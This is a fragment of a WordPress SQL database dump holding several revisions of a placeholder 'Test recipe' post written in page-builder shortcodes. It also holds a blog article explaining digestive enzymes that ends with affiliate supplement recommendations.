05:45:07','2020-04-29 05:45:07','',5410,'http://tummyrevolution.com/5410-revision-v1/',0,'revision','',0),(5412,1,'2020-04-29 10:11:27','2020-04-29 10:11:27','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_empty_space height=\"2px\"][vc_column_text]I love this salad because its so easy to make and full of flavour and crunch.[/vc_column_text][vc_column_text]It\'s very easy to put everything tepogether but don\'t drown your salad in dressing[/vc_column_text][vc_empty_space height=\"16px\"][vc_single_image image=\"5391\" img_size=\"large\" alignment=\"center\"][vc_column_text]Now go and make it yourself[/vc_column_text][vc_empty_space height=\"45px\"][vc_row_inner][vc_column_inner][qodef_image_gallery type=\"grid\" enable_image_shadow=\"no\" number_of_columns=\"two\" space_between_items=\"small\" images=\"5013\" image_size=\"1600x1000\"][/vc_column_inner][/vc_row_inner][vc_empty_space height=\"20px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][qodef_recipe ingredients_1=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20sugar%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20nuts%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch**%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%221%20tsp%20baking%20soda%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%223-4%20tbs%20of%20water%22%7D%5D\" ingredients_2=\"%5B%7B%22ingredient%22%3A%22Olive%20Oil%22%7D%2C%7B%22ingredient%22%3A%22Balsamic%20vinegar%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%221%20tbs%20lemon%20juice%22%7D%5D\" ingredients_3=\"%5B%7B%7D%5D\" recipe_name=\"Figs Smoothie\" image=\"4994\" prep_time=\"20 Minutes\" cook_time=\"230 Minutes\" name_1=\"Salad\" instructions=\"%5B%7B%22instruction%22%3A%22In%20a%20large%20mixing%20bowl%2C%20combine%20the%20almond%20flour%2C%20arrowroot%2C%20baking%20powder%2C%20salt%2C%20and%20maple%20syrup.%20Mix%20adding%20the%20water%20slowly%20to%20form%20a%20sticky%20ball%20of%20dough.%22%7D%2C%7B%22instruction%22%3A%22On%20a%20piece%20of%20parchment%20paper%2C%20press%2Froll%20into%20a%20circle%20the%20same%20size%20as%20your%20pan.%20Set%20aside.%22%7D%2C%7B%22instruction%22%3A%22Peel%2C%20core%2C%20and%20quarter%20the%20apples.%22%7D%2C%7B%22instruction%22%3A%22In%20a%20tart%20tatin%20dish%20(or%20a%20saucepan)%20combine%20the%20coconut%20milk%2C%20maple%20syrup%2C%20apple%20juice%2C%20and%20vanilla.%20Bring%20to%20a%20simmer%20over%20medium%20heat.%22%7D%2C%7B%22instruction%22%3A%22Add%20the%20apples.%20%22%7D%2C%7B%22instruction%22%3A%22Cook%20stirring%20occasionally%20over%20medium%20heat%20until%20the%20caramel%20is%20thick%20and%20the%20apples%20are%20soft.%20About%2020-25%20minutes.%20%22%7D%5D\" notes=\"*For an oat flour option, use this crust recipe instead.\r\n\r\n**You can use tapioca or cornstarch instead.\r\n\r\n***You can use water instead, but it will be less sweet and flavorful.\" name_2=\"Dressing\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]','Test recipe','','private','open','open','','test-recipe','','','2020-04-29 10:16:18','2020-04-29 10:16:18','',0,'http://tummyrevolution.com/?p=5412',0,'post','',0),(5413,1,'2020-04-29 10:03:31','2020-04-29 10:03:31','

[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_empty_space height=\"2px\"][vc_column_text]I love this salad because its so easy to make and full of flavour and crunch.[/vc_column_text][vc_column_text]It\'s very easy to put everything tepogether but don\'t drown your salad in dressing[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Now go and make it yourself[/vc_column_text][vc_empty_space height=\"45px\"][vc_row_inner][vc_column_inner][qodef_image_gallery type=\"grid\" enable_image_shadow=\"no\" number_of_columns=\"two\" space_between_items=\"small\" images=\"5013,5012,5020\" image_size=\"full\"][/vc_column_inner][/vc_row_inner][vc_empty_space height=\"20px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][qodef_recipe ingredients_1=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20sugar%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20nuts%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch**%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%221%20tsp%20baking%20soda%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%223-4%20tbs%20of%20water%22%7D%5D\" ingredients_2=\"%5B%7B%22ingredient%22%3A%22Olive%20Oil%22%7D%2C%7B%22ingredient%22%3A%22Balsamic%20vinegar%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%221%20tbs%20lemon%20juice%22%7D%5D\" ingredients_3=\"%5B%7B%7D%5D\" recipe_name=\"Figs Smoothie\" image=\"4994\" prep_time=\"20 Minutes\" cook_time=\"230 Minutes\" name_1=\"Salad\" instructions=\"%5B%7B%22instruction%22%3A%22In%20a%20large%20mixing%20bowl%2C%20combine%20the%20almond%20flour%2C%20arrowroot%2C%20baking%20powder%2C%20salt%2C%20and%20maple%20syrup.%20Mix%20adding%20the%20water%20slowly%20to%20form%20a%20sticky%20ball%20of%20dough.%22%7D%2C%7B%22instruction%22%3A%22On%20a%20piece%20of%20parchment%20paper%2C%20press%2Froll%20into%20a%20circle%20the%20same%20size%20as%20your%20pan.%20Set%20aside.%22%7D%2C%7B%22instruction%22%3A%22Peel%2C%20core%2C%20and%20quarter%20the%20apples.%22%7D%2C%7B%22instruction%22%3A%22In%20a%20tart%20tatin%20dish%20(or%20a%20saucepan)%20combine%20the%20coconut%20milk%2C%20maple%20syrup%2C%20apple%20juice%2C%20and%20vanilla.%20Bring%20to%20a%20simmer%20over%20medium%20heat.%22%7D%2C%7B%22instruction%22%3A%22Add%20the%20apples.%20%22%7D%2C%7B%22instruction%22%3A%22Cook%20stirring%20occasionally%20over%20medium%20heat%20until%20the%20caramel%20is%20thick%20and%20the%20apples%20are%20soft.%20About%2020-25%20minutes.%20%22%7D%5D\" notes=\"*For an oat flour option, use this crust recipe instead.

\r\n

**You can use tapioca or cornstarch instead.

\r\n

***You can use water instead, but it will be less sweet and flavorful.\" name_2=\"Dressing\"][/vc_column][/vc_row]

\r\n','Test recipe','','inherit','closed','closed','','5412-revision-v1','','','2020-04-29 10:03:31','2020-04-29 10:03:31','',5412,'http://tummyrevolution.com/5412-revision-v1/',0,'revision','',0),(5414,1,'2020-04-29 10:09:27','2020-04-29 10:09:27','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_empty_space height=\"2px\"][vc_column_text]I love this salad because its so easy to make and full of flavour and crunch.[/vc_column_text][vc_column_text]It\'s very easy to put everything tepogether but don\'t drown your salad in dressing[/vc_column_text][vc_empty_space height=\"16px\"][vc_column_text]Now go and make it yourself[/vc_column_text][vc_empty_space height=\"45px\"][vc_row_inner][vc_column_inner][qodef_image_gallery type=\"grid\" enable_image_shadow=\"no\" number_of_columns=\"two\" space_between_items=\"small\" images=\"5013\" image_size=\"full\"][/vc_column_inner][/vc_row_inner][vc_empty_space height=\"20px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][qodef_recipe ingredients_1=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20sugar%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20nuts%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch**%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%221%20tsp%20baking%20soda%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%223-4%20tbs%20of%20water%22%7D%5D\" ingredients_2=\"%5B%7B%22ingredient%22%3A%22Olive%20Oil%22%7D%2C%7B%22ingredient%22%3A%22Balsamic%20vinegar%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%221%20tbs%20lemon%20juice%22%7D%5D\" ingredients_3=\"%5B%7B%7D%5D\" recipe_name=\"Figs Smoothie\" image=\"4994\" prep_time=\"20 Minutes\" cook_time=\"230 Minutes\" name_1=\"Salad\" instructions=\"%5B%7B%22instruction%22%3A%22In%20a%20large%20mixing%20bowl%2C%20combine%20the%20almond%20flour%2C%20arrowroot%2C%20baking%20powder%2C%20salt%2C%20and%20maple%20syrup.%20Mix%20adding%20the%20water%20slowly%20to%20form%20a%20sticky%20ball%20of%20dough.%22%7D%2C%7B%22instruction%22%3A%22On%20a%20piece%20of%20parchment%20paper%2C%20press%2Froll%20into%20a%20circle%20the%20same%20size%20as%20your%20pan.%20Set%20aside.%22%7D%2C%7B%22instruction%22%3A%22Peel%2C%20core%2C%20and%20quarter%20the%20apples.%22%7D%2C%7B%22instruction%22%3A%22In%20a%20tart%20tatin%20dish%20(or%20a%20saucepan)%20combine%20the%20coconut%20milk%2C%20maple%20syrup%2C%20apple%20juice%2C%20and%20vanilla.%20Bring%20to%20a%20simmer%20over%20medium%20heat.%22%7D%2C%7B%22instruction%22%3A%22Add%20the%20apples.%20%22%7D%2C%7B%22instruction%22%3A%22Cook%20stirring%20occasionally%20over%20medium%20heat%20until%20the%20caramel%20is%20thick%20and%20the%20apples%20are%20soft.%20About%2020-25%20minutes.%20%22%7D%5D\" notes=\"*For an oat flour option, use this crust recipe instead.\r\n\r\n**You can use tapioca or cornstarch instead.\r\n\r\n***You can use water instead, but it will be less sweet and flavorful.\" name_2=\"Dressing\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"5391\"][/vc_column][/vc_row]','Test recipe','','inherit','closed','closed','','5412-revision-v1','','','2020-04-29 10:09:27','2020-04-29 10:09:27','',5412,'http://tummyrevolution.com/5412-revision-v1/',0,'revision','',0),(5415,1,'2020-04-29 10:11:17','2020-04-29 10:11:17','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_empty_space height=\"2px\"][vc_column_text]I love this salad because its so easy to make and full of flavour and crunch.[/vc_column_text][vc_column_text]It\'s very easy to put everything tepogether but don\'t drown your salad in dressing[/vc_column_text][vc_empty_space height=\"16px\"][vc_single_image image=\"5391\" img_size=\"large\" alignment=\"center\"][vc_column_text]Now go and make it yourself[/vc_column_text][vc_empty_space height=\"45px\"][vc_row_inner][vc_column_inner][qodef_image_gallery type=\"grid\" enable_image_shadow=\"no\" number_of_columns=\"two\" space_between_items=\"small\" images=\"5013\" image_size=\"full\"][/vc_column_inner][/vc_row_inner][vc_empty_space height=\"20px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][qodef_recipe ingredients_1=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20sugar%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20nuts%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch**%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%221%20tsp%20baking%20soda%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%223-4%20tbs%20of%20water%22%7D%5D\" ingredients_2=\"%5B%7B%22ingredient%22%3A%22Olive%20Oil%22%7D%2C%7B%22ingredient%22%3A%22Balsamic%20vinegar%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%221%20tbs%20lemon%20juice%22%7D%5D\" ingredients_3=\"%5B%7B%7D%5D\" recipe_name=\"Figs Smoothie\" image=\"4994\" prep_time=\"20 Minutes\" cook_time=\"230 Minutes\" name_1=\"Salad\" instructions=\"%5B%7B%22instruction%22%3A%22In%20a%20large%20mixing%20bowl%2C%20combine%20the%20almond%20flour%2C%20arrowroot%2C%20baking%20powder%2C%20salt%2C%20and%20maple%20syrup.%20Mix%20adding%20the%20water%20slowly%20to%20form%20a%20sticky%20ball%20of%20dough.%22%7D%2C%7B%22instruction%22%3A%22On%20a%20piece%20of%20parchment%20paper%2C%20press%2Froll%20into%20a%20circle%20the%20same%20size%20as%20your%20pan.%20Set%20aside.%22%7D%2C%7B%22instruction%22%3A%22Peel%2C%20core%2C%20and%20quarter%20the%20apples.%22%7D%2C%7B%22instruction%22%3A%22In%20a%20tart%20tatin%20dish%20(or%20a%20saucepan)%20combine%20the%20coconut%20milk%2C%20maple%20syrup%2C%20apple%20juice%2C%20and%20vanilla.%20Bring%20to%20a%20simmer%20over%20medium%20heat.%22%7D%2C%7B%22instruction%22%3A%22Add%20the%20apples.%20%22%7D%2C%7B%22instruction%22%3A%22Cook%20stirring%20occasionally%20over%20medium%20heat%20until%20the%20caramel%20is%20thick%20and%20the%20apples%20are%20soft.%20About%2020-25%20minutes.%20%22%7D%5D\" notes=\"*For an oat flour option, use this crust recipe instead.\r\n\r\n**You can use tapioca or cornstarch instead.\r\n\r\n***You can use water instead, but it will be less sweet and flavorful.\" name_2=\"Dressing\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]','Test recipe','','inherit','closed','closed','','5412-revision-v1','','','2020-04-29 10:11:17','2020-04-29 10:11:17','',5412,'http://tummyrevolution.com/5412-revision-v1/',0,'revision','',0),(5416,1,'2020-04-29 10:16:17','2020-04-29 10:16:17','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_empty_space height=\"2px\"][vc_column_text]I love this salad because its so easy to make and full of flavour and crunch.[/vc_column_text][vc_column_text]It\'s very easy to put everything tepogether but don\'t drown your salad in dressing[/vc_column_text][vc_empty_space height=\"16px\"][vc_single_image image=\"5391\" img_size=\"large\" alignment=\"center\"][vc_column_text]Now go and make it yourself[/vc_column_text][vc_empty_space height=\"45px\"][vc_row_inner][vc_column_inner][qodef_image_gallery type=\"grid\" enable_image_shadow=\"no\" number_of_columns=\"two\" space_between_items=\"small\" images=\"5013\" image_size=\"1600x1000\"][/vc_column_inner][/vc_row_inner][vc_empty_space height=\"20px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][qodef_recipe ingredients_1=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20sugar%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20nuts%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch**%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%221%20tsp%20baking%20soda%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%223-4%20tbs%20of%20water%22%7D%5D\" ingredients_2=\"%5B%7B%22ingredient%22%3A%22Olive%20Oil%22%7D%2C%7B%22ingredient%22%3A%22Balsamic%20vinegar%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%221%20tbs%20lemon%20juice%22%7D%5D\" ingredients_3=\"%5B%7B%7D%5D\" recipe_name=\"Figs Smoothie\" image=\"4994\" prep_time=\"20 Minutes\" cook_time=\"230 Minutes\" name_1=\"Salad\" instructions=\"%5B%7B%22instruction%22%3A%22In%20a%20large%20mixing%20bowl%2C%20combine%20the%20almond%20flour%2C%20arrowroot%2C%20baking%20powder%2C%20salt%2C%20and%20maple%20syrup.%20Mix%20adding%20the%20water%20slowly%20to%20form%20a%20sticky%20ball%20of%20dough.%22%7D%2C%7B%22instruction%22%3A%22On%20a%20piece%20of%20parchment%20paper%2C%20press%2Froll%20into%20a%20circle%20the%20same%20size%20as%20your%20pan.%20Set%20aside.%22%7D%2C%7B%22instruction%22%3A%22Peel%2C%20core%2C%20and%20quarter%20the%20apples.%22%7D%2C%7B%22instruction%22%3A%22In%20a%20tart%20tatin%20dish%20(or%20a%20saucepan)%20combine%20the%20coconut%20milk%2C%20maple%20syrup%2C%20apple%20juice%2C%20and%20vanilla.%20Bring%20to%20a%20simmer%20over%20medium%20heat.%22%7D%2C%7B%22instruction%22%3A%22Add%20the%20apples.%20%22%7D%2C%7B%22instruction%22%3A%22Cook%20stirring%20occasionally%20over%20medium%20heat%20until%20the%20caramel%20is%20thick%20and%20the%20apples%20are%20soft.%20About%2020-25%20minutes.%20%22%7D%5D\" notes=\"*For an oat flour option, use this crust recipe instead.\r\n\r\n**You can use tapioca or cornstarch instead.\r\n\r\n***You can use water instead, but it will be less sweet and flavorful.\" name_2=\"Dressing\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]','Test recipe','','inherit','closed','closed','','5412-autosave-v1','','','2020-04-29 10:16:17','2020-04-29 10:16:17','',5412,'http://tummyrevolution.com/5412-autosave-v1/',0,'revision','',0),(5417,1,'2020-04-29 10:16:18','2020-04-29 10:16:18','[vc_row css=\".vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}\"][vc_column][vc_empty_space height=\"2px\"][vc_column_text]I love this salad because its so easy to make and full of flavour and crunch.[/vc_column_text][vc_column_text]It\'s very easy to put everything tepogether but don\'t drown your salad in dressing[/vc_column_text][vc_empty_space height=\"16px\"][vc_single_image image=\"5391\" img_size=\"large\" alignment=\"center\"][vc_column_text]Now go and make it yourself[/vc_column_text][vc_empty_space height=\"45px\"][vc_row_inner][vc_column_inner][qodef_image_gallery type=\"grid\" enable_image_shadow=\"no\" number_of_columns=\"two\" space_between_items=\"small\" images=\"5013\" image_size=\"1600x1000\"][/vc_column_inner][/vc_row_inner][vc_empty_space height=\"20px\"][vc_column_text]Pro sint falli definitiones no, vel ei verear intellegat. At pri civibus consequat efficiantur, sea altera alterum necessitatibus ea. Odio nostrud vel te, ex sit dicam persecuti. Ea adhuc zril cum, suas brute legimus mei at. At aliquam facilis minimum cum, eum noster dolores voluptatum ea, populo commodo est in. Nec id appareat facilisis. Per in habemus electram adolescens. Possit appellantur his ne, vel at albucius iracundia, quo at expetenda conceptam utamur conclusion.[/vc_column_text][vc_empty_space height=\"45px\"][qodef_recipe ingredients_1=\"%5B%7B%22ingredient%22%3A%222%20cups%20almond%20flour%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20sugar%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20nuts%22%7D%2C%7B%22ingredient%22%3A%221%2F2%20cup%20(70g)%20arrowroot%20starch**%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%221%20tsp%20baking%20soda%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%223-4%20tbs%20of%20water%22%7D%5D\" ingredients_2=\"%5B%7B%22ingredient%22%3A%22Olive%20Oil%22%7D%2C%7B%22ingredient%22%3A%22Balsamic%20vinegar%22%7D%2C%7B%22ingredient%22%3A%221%2F4%20cup%20(90g)%20maple%20syrup%22%7D%2C%7B%22ingredient%22%3A%22Pinch%20of%20salt%22%7D%2C%7B%22ingredient%22%3A%221%20tbs%20lemon%20juice%22%7D%5D\" ingredients_3=\"%5B%7B%7D%5D\" recipe_name=\"Figs Smoothie\" image=\"4994\" prep_time=\"20 Minutes\" cook_time=\"230 Minutes\" name_1=\"Salad\" instructions=\"%5B%7B%22instruction%22%3A%22In%20a%20large%20mixing%20bowl%2C%20combine%20the%20almond%20flour%2C%20arrowroot%2C%20baking%20powder%2C%20salt%2C%20and%20maple%20syrup.%20Mix%20adding%20the%20water%20slowly%20to%20form%20a%20sticky%20ball%20of%20dough.%22%7D%2C%7B%22instruction%22%3A%22On%20a%20piece%20of%20parchment%20paper%2C%20press%2Froll%20into%20a%20circle%20the%20same%20size%20as%20your%20pan.%20Set%20aside.%22%7D%2C%7B%22instruction%22%3A%22Peel%2C%20core%2C%20and%20quarter%20the%20apples.%22%7D%2C%7B%22instruction%22%3A%22In%20a%20tart%20tatin%20dish%20(or%20a%20saucepan)%20combine%20the%20coconut%20milk%2C%20maple%20syrup%2C%20apple%20juice%2C%20and%20vanilla.%20Bring%20to%20a%20simmer%20over%20medium%20heat.%22%7D%2C%7B%22instruction%22%3A%22Add%20the%20apples.%20%22%7D%2C%7B%22instruction%22%3A%22Cook%20stirring%20occasionally%20over%20medium%20heat%20until%20the%20caramel%20is%20thick%20and%20the%20apples%20are%20soft.%20About%2020-25%20minutes.%20%22%7D%5D\" notes=\"*For an oat flour option, use this crust recipe instead.\r\n\r\n**You can use tapioca or cornstarch instead.\r\n\r\n***You can use water instead, but it will be less sweet and flavorful.\" name_2=\"Dressing\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]','Test recipe','','inherit','closed','closed','','5412-revision-v1','','','2020-04-29 10:16:18','2020-04-29 10:16:18','',5412,'http://tummyrevolution.com/5412-revision-v1/',0,'revision','',0),(5445,1,'2023-09-12 05:37:27','0000-00-00 00:00:00',' ','','','draft','closed','closed','','','','','2023-09-12 05:37:27','0000-00-00 00:00:00','',0,'https://tummyrevolution.com/?p=5445',1,'nav_menu_item','',0),(5446,1,'2023-09-12 06:25:41','2023-09-12 06:25:41','\n
\n

Enzymes might sound like complex chemical compounds, but they are actually tiny molecular machines that play a pivotal role in our bodies and the natural world. Often referred to as the \"catalysts of life,\" enzymes are essential for a multitude of biochemical processes that keep our bodies functioning smoothly. In this article, we\'ll delve into the fascinating world of enzymes, understanding what they are and why they are so crucial for our well-being.
Skip straight to 5 top enzyme supplement list HERE

\n\n\n\n

What Are Enzymes?

\n\n\n\n

Enzymes are protein molecules with a unique structure that enables them to accelerate chemical reactions without being consumed or altered in the process. Think of them as nature\'s microscopic workers, facilitating reactions that would otherwise be too slow to sustain life. Enzymes work by binding to specific molecules, known as substrates, and then transforming them into products through a series of precisely orchestrated steps.

\n\n\n\n

Enzymes in Digestion

\n\n\n\n

One of the most well-known roles of enzymes is in the digestive system. Digestive enzymes help break down complex nutrients into smaller, more absorbable forms that the body can use. For example, amylase enzymes break down carbohydrates into sugars, protease enzymes break down proteins into amino acids, and lipase enzymes break down fats into fatty acids and glycerol. This breakdown process is crucial for nutrient absorption and energy production.

\n\n\n\n

Enzymes and Cellular Processes

\n\n\n\n

Enzymes are not limited to digestion; they are involved in virtually every cellular process within our bodies. From DNA replication and repair to the synthesis of new molecules, enzymes regulate and accelerate these processes to ensure our cells function optimally. Without enzymes, essential cellular functions would be sluggish or non-existent.

\n\n\n\n

Health Benefits of Enzymes

\n\n\n\n

Enzymes also offer several health benefits beyond digestion and cellular processes:

\n\n\n\n
    \n
  1. Digestive Health: Enzyme supplements can aid individuals with digestive disorders, such as lactose intolerance or gluten sensitivity, by assisting in the breakdown of specific compounds that might otherwise cause discomfort.
  2. \n\n\n\n
  3. Inflammation Reduction: Some enzymes possess anti-inflammatory properties, helping to modulate the body\'s immune response and reduce inflammation associated with various health conditions.
  4. \n\n\n\n
  5. Nutrient Absorption: By aiding in the breakdown of nutrients, enzymes enhance nutrient absorption, which can lead to improved overall health and energy levels.
  6. \n\n\n\n
  7. Gut Health: Certain enzymes, such as proteolytic enzymes, are believed to promote a healthy gut environment by breaking down harmful proteins and supporting the growth of beneficial bacteria.
  8. \n\n\n\n
  9. Metabolism Boost: Enzymes play a role in metabolism, and their proper function can contribute to a balanced metabolic rate.
  10. \n
\n\n\n\n

Conclusion

\n\n\n\n

Enzymes are the unsung heroes of life, driving essential biochemical reactions that sustain us from the cellular level to the systems that keep us alive and well. Without these molecular catalysts, life as we know it would be impossible. From aiding in digestion to supporting overall health, enzymes are a testament to the intricate design of our bodies and the power of nature\'s biochemical processes. So, the next time you enjoy a meal or marvel at the marvels of life, remember the remarkable work of enzymes that make it all possible.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you choose to make a purchase using my links

\n
\n\n\n\n

Here are our top 5 enzyme supplement recommendations

\n\n\n\n

Biocare Polyzyme Forte - High potency broad spectrum digestive enzymes

\n\n\n\n\"\"\n\n\n\n

Zenwise Digestive Enzymes - Probiotic Multi Enzyme with Probiotics and Prebiotics for Digestive Health and Bloating Relief for Women and Men, Enzymes for Digestion and Gut Health - 180 Count

\n\n\n\n\"\"\n\n\n\n

Pure Encapsulations Digestive Enzymes Ultra - Vegetarian Digestive Enzyme Supplement to Support Protein, Carb, Fiber, and Dairy Digestion* - 90 Capsules

\n\n\n\n\"\"\n\n\n\n

NOW Supplements - Super Enzymes, Formulated with Bromelain, Ox Bile, Pancreatin and Papain,180 Capsules

\n\n\n\n\"\"\n\n\n\n


Enzymedica Digest Gold + ATPro, Maximum Strength Enzyme Formula, Prevents Bloating and Gas, 14 Key Enzymes Including Amylase, Protease, Lipase and Lactase, 120 Capsules

\n\n\n\n\"\"\n\n\n

\n

